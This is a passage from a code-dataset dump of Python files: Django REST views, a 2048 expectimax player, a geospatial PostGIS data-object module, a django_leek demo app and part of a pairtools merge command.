"usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 131, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.name.like", "line_number": 134, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.name", "line_number": 134, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 134, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.type.in_", "line_number": 137, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.type", "line_number": 137, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 137, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.language.in_", "line_number": 140, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.language", "line_number": 140, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 140, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.size", "line_number": 146, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 146, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.size", "line_number": 148, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 148, "usage_type": "name"}, {"api_name": "re.search", "line_number": 152, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 168, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 168, "usage_type": "attribute"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 173, "usage_type": "call"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 175, "usage_type": "call"}, {"api_name": "zizi.core.misc.withconfig", "line_number": 159, "usage_type": 
"name"}]} +{"seq_id": "466290066", "text": "from django.http import (\n HttpResponse,\n Http404\n)\nfrom rest_framework import generics\nfrom rest_framework.renderers import JSONRenderer\n\nfrom extras.models import (\n Category,\n Item\n)\nfrom extras.api.serializers import (\n CategorySerializer,\n ItemSerializer,\n)\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n\nclass CategoryList(generics.ListAPIView):\n \"\"\"\n Returns a list of all categories.\n \"\"\"\n model = Category\n serializer_class = CategorySerializer\n\n def get_queryset(self):\n \"\"\"\n Get the categories\n \"\"\"\n categories = Category.objects.all()\n\n return categories\n\n\nclass ItemList(generics.ListAPIView):\n \"\"\"\n Returns a list of all items for the specified category.\n \"\"\"\n model = Item\n serializer_class = ItemSerializer\n\n def get_queryset(self):\n \"\"\"\n Get the items for this category\n \"\"\"\n # make sure there's a category query param\n if 'category' not in self.request.GET:\n raise Http404\n\n # Look up the categtory\n category = Category.objects.filter(name=self.request.GET['category'].capitalize())\n\n # make sure it's legit\n if category:\n\n # save the cateogory for the request\n items = Item.objects.filter(category=category)\n\n return items\n\n raise Http404\n\n# def items(request):\n# \"\"\"\n# Retrieve a list of items from the server, keyed to the category query param\n# \"\"\"\n# # make sure there's a category query param\n# if 'category' not in request.GET:\n# raise Http404\n\n# # save the cateogory for the request\n# key = request.GET['category']\n\n# data = {\n# \"items\": [\n# {\n# \"id\": 1,\n# \"name\": \"ember-infinite-scroll\",\n# \"description\": \"An example of infinite scrolling using ember\",\n# \"url\": 'http://jsbin.com/famer/1',\n# \"repository\": 'https://github.com/bantic/ember-infinite-scroll',\n# },\n# {\n# \"id\": 2,\n# \"name\": \"oblivion\",\n# \"description\": \"An example of oblivion\",\n# \"url\": 'https://github.com',\n# \"repository\": 'https://github.com/commadelimited/extras',\n# },\n# ]\n# }\n# return JSONResponse(data)\n", "sub_path": "extras/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.renderers.JSONRenderer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 27, "usage_type": "name"}, {"api_name": "extras.models.Category", "line_number": 31, "usage_type": "name"}, {"api_name": "extras.api.serializers.CategorySerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "extras.models.Category.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "extras.models.Category.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "extras.models.Category", "line_number": 38, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 43, "usage_type": "name"}, 
{"api_name": "extras.models.Item", "line_number": 47, "usage_type": "name"}, {"api_name": "extras.api.serializers.ItemSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 56, "usage_type": "name"}, {"api_name": "extras.models.Category.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "extras.models.Category.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "extras.models.Category", "line_number": 59, "usage_type": "name"}, {"api_name": "extras.models.Item.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "extras.models.Item.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "extras.models.Item", "line_number": 65, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "257033124", "text": "import copy\nimport itertools\nimport math\nimport random\n\nimport ai\n\nMAX_DEPTH = 3\n\n\ndef merge_left(b):\n # merge the board left\n # this function is reused in the other merges\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n def merge(row, acc):\n # recursive helper for merge_left\n # if len row == 0, return accumulator\n if not row:\n return acc\n\n # x = first element\n x = row[0]\n # if len(row) == 1, add element to accu\n if len(row) == 1:\n return acc + [x]\n # if len(row) >= 2\n if x == row[1]:\n # add row[0] + row[1] to accu, continue with row[2:]\n return merge(row[2:], acc + [2 * x])\n else:\n # add row[0] to accu, continue with row[1:]\n return merge(row[1:], acc + [x])\n\n new_b = []\n for row in b:\n # merge row, skip the [0]'s\n merged = merge([x for x in row if x != 0], [])\n # add [0]'s to the right if necessary\n merged = merged + [0] * (len(row) - len(merged))\n new_b.append(merged)\n # return [[2, 8, 0, 0], [2, 4, 8, 0], [4, 0, 0, 0], [4, 4, 0, 0]]\n return new_b\n\n\ndef merge_right(b):\n # merge the board right\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n def reverse(x):\n return list(reversed(x))\n\n # rev = [[4, 4, 2, 0], [8, 4, 2, 0], [4, 0, 0, 0], [2, 2, 2, 2]]\n rev = [reverse(x) for x in b]\n # ml = [[8, 2, 0, 0], [8, 4, 2, 0], [4, 0, 0, 0], [4, 4, 0, 0]]\n ml = merge_left(rev)\n # return [[0, 0, 2, 8], [0, 2, 4, 8], [0, 0, 0, 4], [0, 0, 4, 4]]\n return [reverse(x) for x in ml]\n\n\ndef merge_up(b):\n # merge the board upward\n # note that zip(*b) is the transpose of b\n # b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n # trans = [[2, 0, 0, 0], [4, 2, 0, 0], [8, 2, 0, 0], [4, 8, 4, 2]]\n trans = merge_left(zip(*b))\n # return [[2, 4, 8, 4], [0, 2, 2, 8], [0, 0, 0, 4], [0, 0, 0, 2]]\n return [list(x) for x in zip(*trans)]\n\n\ndef merge_down(b):\n # merge the board downward\n trans = merge_right(zip(*b))\n # return [[0, 0, 0, 4], [0, 0, 0, 8], [0, 2, 8, 4], [2, 4, 2, 2]]\n return [list(x) for x in zip(*trans)]\n\n\n# location: after functions\nMERGE_FUNCTIONS = {\n 'left': merge_left,\n 'right': merge_right,\n 'up': merge_up,\n 'down': merge_down\n}\n\n\ndef move_exists(b):\n # check whether or not a move exists on the board\n # b = [[1, 2, 3, 4], [5, 6, 7, 8]]\n # move_exists(b) return False\n def inner(b):\n for row in b:\n for x, y in zip(row[:-1], row[1:]):\n # tuples (1, 2),(2, 3),(3, 4),(5, 6),(6, 7),(7, 8)\n # if same value or an empty cell\n if x == y or x == 0 or y == 0:\n return True\n return False\n\n # check horizontally and vertically\n if inner(b) or inner(zip(*b)):\n return True\n else:\n return False\n\n\ndef 
start():\n # make initial board\n b = [[0] * 4 for _ in range(4)]\n add_two_four(b)\n add_two_four(b)\n return b\n\n\ndef play_move(b, direction):\n # get merge functin an apply it to board\n b = MERGE_FUNCTIONS[direction](b)\n add_two_four(b)\n return b\n\n\ndef add_two_four(b):\n # add a random tile to the board at open position.\n # chance of placing a 2 is 90%; chance of 4 is 10%\n rows, cols = list(range(4)), list(range(4))\n random.shuffle(rows)\n random.shuffle(cols)\n distribution = [2] * 9 + [4]\n for i, j in itertools.product(rows, cols):\n if b[i][j] == 0:\n b[i][j] = random.sample(distribution, 1)[0]\n return (b)\n else:\n continue\n\n\ndef game_state(b):\n for i in range(4):\n for j in range(4):\n if b[i][j] >= 2048:\n return 'win'\n return 'lose'\n\n\ndef test():\n b = [[0, 2, 4, 4], [0, 2, 4, 8], [0, 0, 0, 4], [2, 2, 2, 2]]\n assert merge_left(b) == [[2, 8, 0, 0], [2, 4, 8, 0], [\n 4, 0, 0, 0], [4, 4, 0, 0]]\n assert merge_right(b) == [[0, 0, 2, 8], [0, 2, 4, 8], [\n 0, 0, 0, 4], [0, 0, 4, 4]]\n assert merge_up(b) == [[2, 4, 8, 4], [0, 2, 2, 8],\n [0, 0, 0, 4], [0, 0, 0, 2]]\n assert merge_down(b) == [[0, 0, 0, 4], [0, 0, 0, 8], [\n 0, 2, 8, 4], [2, 4, 2, 2]]\n assert move_exists(b) == True\n b = [[2, 8, 4, 0], [16, 0, 0, 0], [2, 0, 2, 0], [2, 0, 0, 0]]\n assert (merge_left(b)) == [[2, 8, 4, 0], [\n 16, 0, 0, 0], [4, 0, 0, 0], [2, 0, 0, 0]]\n assert (merge_right(b)) == [[0, 2, 8, 4], [\n 0, 0, 0, 16], [0, 0, 0, 4], [0, 0, 0, 2]]\n assert (merge_up(b)) == [[2, 8, 4, 0], [\n 16, 0, 2, 0], [4, 0, 0, 0], [0, 0, 0, 0]]\n assert (merge_down(b)) == [[0, 0, 0, 0], [\n 2, 0, 0, 0], [16, 0, 4, 0], [4, 8, 2, 0]]\n assert (move_exists(b)) == True\n b = [[32, 64, 2, 16], [8, 32, 16, 2], [4, 16, 8, 4], [2, 8, 4, 2]]\n assert (move_exists(b)) == False\n b = [[0, 7, 0, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 7, 0, 0]]\n for i in range(11):\n add_two_four(b)\n print(b)\n\n\ndef get_random_move():\n return random.choice(list(MERGE_FUNCTIONS.keys()))\n\n\ndef possible_boards(b):\n # Returns a list of tuples with the boards and their chance of happening.\n boards, n = [], len(b)\n\n # Retrieve the number of empty spaces.\n empty = ai.empty(b)\n\n for i in range(n):\n for j in range(n):\n\n # Check whether the cell is empty.\n if b[i][j] == 0:\n\n # Copy the board and set the value to 2.\n board = copy.deepcopy(b)\n board[i][j] = 2\n\n # Add the board and it's chance of occuring.\n boards.append((0.9 * (100 / empty), board))\n\n # Copy the board and set the value to 4.\n board = copy.deepcopy(b)\n board[i][j] = 4\n\n # Add the board and it's chance of occuring.\n boards.append((0.1 * (100 / empty), board))\n\n return boards\n\n\ndef get_expectimax_move(b):\n # Determine the best move using expectimax.\n best_dir, best_score = 0, -math.inf\n\n for dir in MERGE_FUNCTIONS.keys():\n board = play_move(copy.deepcopy(b), dir)\n\n # Determine the depth based on the number of empty spaces.\n depth = 5 if ai.empty(board) < 6 else 3\n\n # Calculate the expectimax score.\n expectimax_score = expectimax(board, depth, False)\n\n if expectimax_score > best_score:\n best_dir, best_score = dir, expectimax_score\n\n return best_dir\n\n\ndef is_terminal(b):\n # Check whether the board is the terminal board state.\n return not move_exists(b)\n\n\ndef expectimax(board, depth, is_max):\n # Calculate the best move using the expectimax algorithm.\n if depth == 0 or is_terminal(board):\n return ai.heuristic(board)\n\n if is_max:\n value = -math.inf\n\n for dir in MERGE_FUNCTIONS.keys():\n # Create the new board.\n 
temp_board = play_move(copy.deepcopy(board), dir)\n score = expectimax(temp_board, depth - 1, False)\n value = max(score, value)\n\n return value\n\n else:\n value = 0\n\n for val in possible_boards(board):\n # Create the new board.\n score = (val[0] * expectimax(val[1], depth - 1, True))\n value += score\n\n return value\n", "sub_path": "artificial-intelligence/2048/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.shuffle", "line_number": 124, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 125, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 127, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 129, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 173, "usage_type": "call"}, {"api_name": "ai.empty", "line_number": 181, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 197, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 208, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 211, "usage_type": "call"}, {"api_name": "ai.empty", "line_number": 214, "usage_type": "call"}, {"api_name": "ai.heuristic", "line_number": 233, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 236, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "493222294", "text": "from __future__ import absolute_import, division, print_function\nfrom builtins import (\n bytes, str, open, super, range, zip, round, input, int, pow, object\n)\n\nfrom sqlalchemy import create_engine, MetaData, Table, text\nfrom geoalchemy2 import Geometry\nimport fiona\nimport geopandas\ntry:\n import osr\nexcept ImportError:\n from osgeo import osr\n\nfrom gaia.filters import filter_postgis\nfrom gaia.geo.gdal_functions import gdal_reproject\nfrom gaia.util import GaiaException, sqlengines\n\n\nclass GaiaDataObject(object):\n def __init__(self, reader=None, dataFormat=None, epsg=None, **kwargs):\n self._data = None\n self._metadata = None\n self._reader = reader\n self._datatype = None\n self._dataformat = dataFormat\n self._epsg = epsg\n\n def get_metadata(self):\n if not self._metadata:\n self._reader.load_metadata(self)\n return self._metadata\n\n def set_metadata(self, metadata):\n self._metadata = metadata\n\n def get_data(self):\n if self._data is None:\n self._reader.load_data(self)\n return self._data\n\n def set_data(self, data):\n self._data = data\n\n def get_epsg(self):\n return self._epsg\n\n def reproject(self, epsg):\n repro = geopandas.GeoDataFrame.copy(self.get_data())\n repro[repro.geometry.name] = repro.geometry.to_crs(epsg=epsg)\n repro.crs = fiona.crs.from_epsg(epsg)\n self._data = repro\n self._epsg = epsg\n\n # Recompute bounds\n geometry = repro['geometry']\n geopandas_bounds = geometry.total_bounds\n xmin, ymin, xmax, ymax = geopandas_bounds\n coords = [[\n [xmin, ymin], [xmax, ymin], [xmax, ymax], [xmin, ymax]\n ]]\n metadata = self.get_metadata()\n bounds = metadata.get('bounds', {})\n bounds['coordinates'] = coords\n metadata['bounds'] = bounds\n self.set_metadata(metadata)\n\n def _getdatatype(self):\n if not self._datatype:\n self.get_metadata()\n if not self._datatype:\n self._datatype = self._metadata.get('type_', 'unknown')\n\n return self._datatype\n\n def 
_setdatatype(self, value):\n        self._datatype = value\n\n    datatype = property(_getdatatype, _setdatatype)\n\n    def _getdataformat(self):\n        if not self._dataformat:\n            self.get_metadata()\n\n        return self._dataformat\n\n    def _setdataformat(self, value):\n        self._dataformat = value\n\n    dataformat = property(_getdataformat, _setdataformat)\n\n\nclass GDALDataObject(GaiaDataObject):\n    def __init__(self, reader=None, **kwargs):\n        super(GDALDataObject, self).__init__(**kwargs)\n        self._reader = reader\n        self._epsgComputed = False\n\n    def get_epsg(self):\n        if not self._epsgComputed:\n            if not self._data:\n                self.get_data()\n\n            projection = self._data.GetProjection()\n            data_crs = osr.SpatialReference(wkt=projection)\n\n            try:\n                self.epsg = int(data_crs.GetAttrValue('AUTHORITY', 1))\n                self._epsgComputed = True\n            except KeyError:\n                raise GaiaException(\"EPSG code could not be determined\")\n\n        return self.epsg\n\n    def reproject(self, epsg):\n        self._data = gdal_reproject(self._data, '', epsg=epsg)\n        self.epsg = epsg\n\n\nclass PostgisDataObject(GaiaDataObject):\n    def __init__(self, reader=None, **kwargs):\n        super(PostgisDataObject, self).__init__(**kwargs)\n\n        self._reader = reader\n\n        self._table = None\n        self._hostname = None\n        self._dbname = None\n        self._user = None\n        self._password = None\n        self._columns = []\n        self._filters = None\n        self._geom_column = 'the_geom'\n        self._epsg = None\n        self._meta = None\n        self._table_obj = None\n\n    # Define table property\n    def _settable(self, table):\n        self._table = table\n\n    def _gettable(self):\n        return self._table\n\n    table = property(_gettable, _settable)\n\n    # Define hostname property\n    def _sethostname(self, hostname):\n        self._hostname = hostname\n\n    def _gethostname(self):\n        return self._hostname\n\n    hostname = property(_gethostname, _sethostname)\n\n    # Define db property\n    def _setdbname(self, dbname):\n        self._dbname = dbname\n\n    def _getdbname(self):\n        return self._dbname\n\n    dbname = property(_getdbname, _setdbname)\n\n    # Define user property\n    def _setuser(self, user):\n        self._user = user\n\n    def _getuser(self):\n        return self._user\n\n    user = property(_getuser, _setuser)\n\n    # Define password property\n    def _setpassword(self, password):\n        self._password = password\n\n    def _getpassword(self):\n        return self._password\n\n    password = property(_getpassword, _setpassword)\n\n    # Define epsg property\n    def _setepsg(self, epsg):\n        self._epsg = epsg\n\n    def _getepsg(self):\n        return self._epsg\n\n    epsg = property(_getepsg, _setepsg)\n\n    # Define filters property\n    def _setfilters(self, filters):\n        self._filters = filters\n\n    def _getfilters(self):\n        return self._filters\n\n    filters = property(_getfilters, _setfilters)\n\n    # Define geom_column property\n    def _setgeom_column(self, geom_column):\n        self._geom_column = geom_column\n\n    def _getgeom_column(self):\n        return self._geom_column\n\n    geom_column = property(_getgeom_column, _setgeom_column)\n\n    # Define engine property\n    def _setengine(self, engine):\n        self._engine = engine\n\n    def _getengine(self):\n        return self._engine\n\n    engine = property(_getengine, _setengine)\n\n    # etc...\n\n    def initialize_engine(self):\n        self._engine = self.get_engine(self.get_connection_string())\n\n        self.get_table_info()\n        self.verify()\n\n    # additional methods in PostgisIO\n\n    def get_engine(self, connection_string):\n        \"\"\"\n        Create and return a SQLAlchemy engine object\n\n        :param connection_string: Database connection string\n        :return: SQLAlchemy Engine object\n        \"\"\"\n        if connection_string not in sqlengines:\n            
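# sqlengines (imported from gaia.util) acts as a module-wide cache: one engine is created per connection string and reused afterwards\n            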
sqlengines[connection_string] = create_engine(\n self.get_connection_string())\n return sqlengines[connection_string]\n\n def verify(self):\n \"\"\"\n Make sure that all PostgisIO columns exist in the actual table\n \"\"\"\n for col in self._columns:\n if col not in self._table_obj.columns.keys():\n raise GaiaException('{} column not found in {}'.format(\n col, self._table_obj))\n\n def get_connection_string(self):\n \"\"\"\n Get connection string based on host, dbname, username, password\n\n :return: Postgres connection string for SQLAlchemy\n \"\"\"\n auth = ''\n if self._user:\n auth = self._user\n if self._password:\n auth = auth + ':' + self._password\n if auth:\n auth += '@'\n conn_string = 'postgresql://{auth}{host}/{dbname}'.format(\n auth=auth, host=self._hostname, dbname=self._dbname)\n\n return conn_string\n\n def get_epsg(self):\n \"\"\"\n Get the EPSG code of the data\n\n :return: EPSG code\n \"\"\"\n return self._epsg\n\n def get_table_info(self):\n \"\"\"\n Use SQLALchemy reflection to gather data on the table, including the\n geometry column, geometry type, and EPSG code, and assign to the\n PostgisIO object's attributes.\n \"\"\"\n epsg = None\n meta = MetaData()\n table_obj = Table(self._table, meta,\n autoload=True, autoload_with=self._engine)\n if not self._columns:\n self._columns = table_obj.columns.keys()\n geo_cols = [(col.name, col.type) for col in table_obj.columns\n if hasattr(col.type, 'srid')]\n if geo_cols:\n geo_col = geo_cols[0]\n self._geom_column = geo_col[0]\n geo_obj = geo_col[1]\n if self._geom_column not in self._columns:\n self._columns.append(self._geom_column)\n if hasattr(geo_obj, 'srid'):\n epsg = geo_obj.srid\n if epsg == -1:\n epsg = 4326\n if hasattr(geo_obj, 'geometry_type'):\n self._geometry_type = geo_obj.geometry_type\n\n self._epsg = epsg\n self._table_obj = table_obj\n self._meta = meta\n\n def get_geometry_type(self):\n \"\"\"\n Get the geometry type of the data\n\n :return: Geometry type\n \"\"\"\n return self._geometry_type\n\n def get_query(self):\n \"\"\"\n Formulate a query string and parameter list based on the\n table name, columns, and filter\n\n :return: Query string\n \"\"\"\n columns = ','.join(['\"{}\"'.format(x) for x in self._columns])\n query = 'SELECT {} FROM \"{}\"'.format(columns, self._table)\n filter_params = []\n if self._filters:\n filter_sql, filter_params = filter_postgis(self._filters)\n query += ' WHERE {}'.format(filter_sql)\n query += ';'\n return str(text(query)), filter_params\n", "sub_path": "gaia/gaia_data.py", "file_name": "gaia_data.py", "file_ext": "py", "file_size_in_byte": 9236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame.copy", "line_number": 49, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "fiona.crs.from_epsg", "line_number": 51, "usage_type": "call"}, {"api_name": "fiona.crs", "line_number": 51, "usage_type": "attribute"}, {"api_name": "builtins.super", "line_number": 95, "usage_type": "call"}, {"api_name": "osgeo.osr.SpatialReference", "line_number": 105, "usage_type": "call"}, {"api_name": "osgeo.osr", "line_number": 105, "usage_type": "name"}, {"api_name": "builtins.int", "line_number": 108, "usage_type": "call"}, {"api_name": "gaia.util.GaiaException", "line_number": 111, "usage_type": "call"}, {"api_name": 
"gaia.geo.gdal_functions.gdal_reproject", "line_number": 116, "usage_type": "call"}, {"api_name": "builtins.super", "line_number": 122, "usage_type": "call"}, {"api_name": "gaia.util.sqlengines", "line_number": 236, "usage_type": "name"}, {"api_name": "gaia.util.sqlengines", "line_number": 237, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 237, "usage_type": "call"}, {"api_name": "gaia.util.sqlengines", "line_number": 239, "usage_type": "name"}, {"api_name": "gaia.util.GaiaException", "line_number": 247, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 283, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 284, "usage_type": "call"}, {"api_name": "gaia.filters.filter_postgis", "line_number": 326, "usage_type": "call"}, {"api_name": "builtins.str", "line_number": 329, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 329, "usage_type": "call"}]} +{"seq_id": "14363433", "text": "from django.conf.urls import url\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.db import models\n\nfrom django_leek.api import Leek, push_task_to_queue\n\nleek = Leek()\n\n\nclass Person(models.Model):\n name = models.CharField(max_length=30)\n\n\n@leek.task\ndef hello(to):\n person = Person.objects.create(name=\"to\")\n person.save()\n\n print('Hello {}!'.format(to))\n\n\ndef index(request):\n if 'queue' in request.GET:\n # Run sync\n hello(to='sync')\n \n # Run async\n hello.offload(to='kwargs')\n hello.offload('args')\n\n push_task_to_queue(hello, to='old')\n return render(request, 'index.html', {'message': '✓ task queued'})\n\n return render(request, 'index.html')\n\n\nurlpatterns = [\n url(r'^$', index),\n]\n", "sub_path": "test_app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 802, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django_leek.api.Leek", "line_number": 8, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django_leek.api.push_task_to_queue", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "372404318", "text": "#!/usr/bin/env python\nimport sys\nimport glob\nimport math\nimport subprocess\nimport click\n\nfrom ..lib import fileio, pairsam_format, headerops\nfrom . import cli, common_io_options\n\nUTIL_NAME = \"pairtools_merge\"\n\n\n@cli.command()\n@click.argument(\n \"pairs_path\",\n nargs=-1,\n type=str,\n)\n@click.option(\n \"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"output file.\"\n \" If the path ends with .gz/.lz4, the output is compressed by bgzip/lz4c.\"\n \" By default, the output is printed into stdout.\",\n)\n@click.option(\n \"--max-nmerge\",\n type=int,\n default=8,\n show_default=True,\n help=\"The maximal number of inputs merged at once. 
For more, store \"\n \"merged intermediates in temporary files.\",\n)\n@click.option(\n \"--tmpdir\",\n type=str,\n default=\"\",\n help=\"Custom temporary folder for merged intermediates.\",\n)\n@click.option(\n \"--memory\",\n type=str,\n default=\"2G\",\n show_default=True,\n help=\"The amount of memory used by default.\",\n)\n@click.option(\n \"--compress-program\",\n type=str,\n default=\"\",\n show_default=True,\n help=\"A binary to compress temporary merged chunks. \"\n \"Must decompress input when the flag -d is provided. \"\n \"Suggested alternatives: lz4c, gzip, lzop, snzip. \"\n \"NOTE: fails silently if the command syntax is wrong. \",\n)\n@click.option(\n \"--nproc\",\n type=int,\n default=8,\n help=\"Number of threads for merging.\",\n show_default=True,\n)\n@click.option(\n \"--nproc-in\",\n type=int,\n default=1,\n show_default=True,\n help=\"Number of processes used by the auto-guessed input decompressing command.\",\n)\n@click.option(\n \"--nproc-out\",\n type=int,\n default=8,\n show_default=True,\n help=\"Number of processes used by the auto-guessed output compressing command.\",\n)\n@click.option(\n \"--cmd-in\",\n type=str,\n default=None,\n help=\"A command to decompress the input. \"\n \"If provided, fully overrides the auto-guessed command. \"\n \"Does not work with stdin. \"\n \"Must read input from stdin and print output into stdout. \"\n \"EXAMPLE: pbgzip -dc -n 3\",\n)\n@click.option(\n \"--cmd-out\",\n type=str,\n default=None,\n help=\"A command to compress the output. \"\n \"If provided, fully overrides the auto-guessed command. \"\n \"Does not work with stdout. \"\n \"Must read input from stdin and print output into stdout. \"\n \"EXAMPLE: pbgzip -c -n 8\",\n)\n@click.option(\n \"--keep-first-header/--no-keep-first-header\",\n default=False,\n show_default=True,\n help=\"Keep the first header or merge the headers together. Default: merge headers.\",\n)\n@click.option(\n \"--concatenate/--no-concatenate\",\n default=False,\n show_default=True,\n help=\"Simple concatenate instead of merging sorted files.\",\n)\n# Using custom IO options\n\n\ndef merge(\n pairs_path, output, max_nmerge, tmpdir, memory, compress_program, nproc, **kwargs\n):\n \"\"\"Merge .pairs/.pairsam files.\n By default, assumes that the files are sorted and maintains the sorting.\n\n Merge triu-flipped sorted pairs/pairsam files. If present, the @SQ records\n of the SAM header must be identical; the sorting order of\n these lines is taken from the first file in the list.\n The ID fields of the @PG records of the SAM header are modified with a\n numeric suffix to produce unique records.\n The other unique SAM and non-SAM header lines are copied into the output header.\n\n PAIRS_PATH : upper-triangular flipped sorted .pairs/.pairsam files to merge\n or a group/groups of .pairs/.pairsam files specified by a wildcard. 
For\n paths ending in .gz/.lz4, the files are decompressed by bgzip/lz4c.\n\n \"\"\"\n merge_py(\n pairs_path,\n output,\n max_nmerge,\n tmpdir,\n memory,\n compress_program,\n nproc,\n **kwargs,\n )\n\n\ndef merge_py(\n pairs_path, output, max_nmerge, tmpdir, memory, compress_program, nproc, **kwargs\n):\n paths = sum([glob.glob(mask) for mask in pairs_path], [])\n\n if len(paths) == 0:\n raise ValueError(f\"No input paths: {pairs_path}\")\n\n outstream = fileio.auto_open(\n output,\n mode=\"w\",\n nproc=kwargs.get(\"nproc_out\"),\n command=kwargs.get(\"cmd_out\", None),\n )\n\n # if there is only one input, bypass merging and do not modify the header\n if len(paths) == 1:\n instream = fileio.auto_open(\n paths[0],\n mode=\"r\",\n nproc=kwargs.get(\"nproc_in\"),\n command=kwargs.get(\"cmd_in\", None),\n )\n for line in instream:\n outstream.write(line)\n if outstream != sys.stdout:\n outstream.close()\n\n return\n\n headers = []\n for path in paths:\n f = fileio.auto_open(\n path,\n mode=\"r\",\n nproc=kwargs.get(\"nproc_in\"),\n command=kwargs.get(\"cmd_in\", None),\n )\n h, _ = headerops.get_header(f)\n headers.append(h)\n f.close()\n # Skip other headers if keep_first_header is True (False by default):\n if kwargs.get(\"keep_first_header\", False):\n break\n\n if not headerops.all_same_columns(headers):\n raise ValueError(\"Input pairs cannot contain different columns\")\n\n merged_header = headerops.merge_headers(headers)\n merged_header = headerops.append_new_pg(merged_header, ID=UTIL_NAME, PN=UTIL_NAME)\n\n outstream.writelines((l + \"\\n\" for l in merged_header))\n outstream.flush()\n\n # If concatenation requested instead of merging sorted input:\n if kwargs.get(\"concatenate\", False):\n command = r\"\"\"\n /bin/bash -c 'export LC_COLLATE=C; export LANG=C; cat \"\"\"\n # Full merge that keeps the ordered input:\n else:\n command = r\"\"\"\n /bin/bash -c 'export LC_COLLATE=C; export LANG=C; sort\n -k {0},{0} -k 